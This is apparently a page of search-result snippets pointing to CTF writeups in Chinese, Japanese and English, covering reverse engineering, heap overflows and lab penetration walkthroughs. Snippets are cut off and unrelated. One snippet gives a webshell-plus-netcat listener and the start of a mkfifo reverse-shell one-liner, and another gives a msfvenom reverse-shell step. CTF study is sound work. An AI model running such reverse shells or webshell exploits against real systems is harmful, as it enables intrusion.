mu.mem_write(0x402116, code) rbp_val =0x100100 bool_arr_addr =0x200000 # mu.reg_write(UC_X86_REG_RIP, 0x402116) mu.reg_write(UC_X86_REG_RBP, rbp_val) # 参数 mu.mem_write(rbp_val +16, struct.pack("<Q", bool_arr_addr)) # idx mu.mem_write(rbp_val -8,b'\x00'*4) ...
CTF_Writeups 参加したCTFの解法をまとめる。 上から新しいもの、解けた順になっている。 作問 SECCON Beginners CTF 2021 TsukuCTF 2021 IMCTF 2021 Ir0nMaiden×WEST-SEC CTF 2022 SECCON Beginners CTF 2022 TsukuCTF 2022 Ricerca CTF 2023 SECCON Beginners CTF 2023 TsukuCTF 2023 SECCON CTF 2023...
初步shell:扫描发现592端口运行有web服务并且看到关键字:“pluck 4.7.13”,搜索发现有任意文件上传漏洞。浏览器打开发现需要密码登录,弱口令“admin”发现能够成功登录。利用exp和弱口令得到一个webshell,本机上执行命令“nc -nlvp 443”开启监听,webshell上执行命令“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i...
*writeups:not justwriteups Follow@gvrp_writeupson Twitter to get new writeups straigt into your feed! Contributing: If you know of any writeups/videos not listed in this repository, feel free to open a Pull Request. To add a new writeup, simply add a new line towriteups.csv: ...
【都是真题】 Windows - 01 初步shell:nmap扫描发现FTP服务存在匿名访问并且列出2个文件:"minimouse.msi" 和 "wece_cms...zip",GitHub上发现有该minimouse服务的exp,本地通过msfvenom生成一个exe格式的反弹shell并放于web目录下并在本地443端口执行监听,执行exp后得到一个shell ...
2024 强网杯逆向 Writeups 最心有余而力不足的一集,做完 vm 颈椎病犯了,第二天根本打。最后,加上学弟学妹打的,最后剩一个 Android 逆向没 AK,要是没有颈椎病这一说肯定 AK 了。感觉快退役了... 原文使用 hackmd 编写,所以图片均托管在外网,图没挂加载不出来图片自己想办法。
TISC 2020 CTF 题目分析及writeups 阅读量2377174 | 发布时间 : 2020-09-30 11:15:09简介TISC(The InfoSecurity Challenge) 2020 CTF 一共包含6道题目,主要涉及密码学、二进制、逆向等知识点,部分题目之间具备一定的连续性,下面对题目进行具体分析。STAGE...
Sample Homoework writeupsDavis, U CMartel, Charles
ps:此WP为nonick大佬所写,原文链接unamer/Writeups 0x01. 堆溢出 漏洞位于0x040173A的comment修改中,此处如果长度输入-1将会有无限的堆操作能力,任意的堆覆盖。 这导致可以直接覆写下一个fun结构的头部指针,我通过覆盖函数结构头部的paramlist指针链表来得到任意地址写,当然首先需要布置好链表的结构。
2024-SICTF-WriteUps_by_AhiSecReverseBaby_C++1.签到题 shift + F12直接看见flagEz_pyc1.在线网址反编译不全,发现是3.8的python版本,直接使用3.8的uncompyle6反编译出源码2.一个数独游戏可以求解不过观察判断条件,发现如果数独正确输出的flag是正确flag的md5后...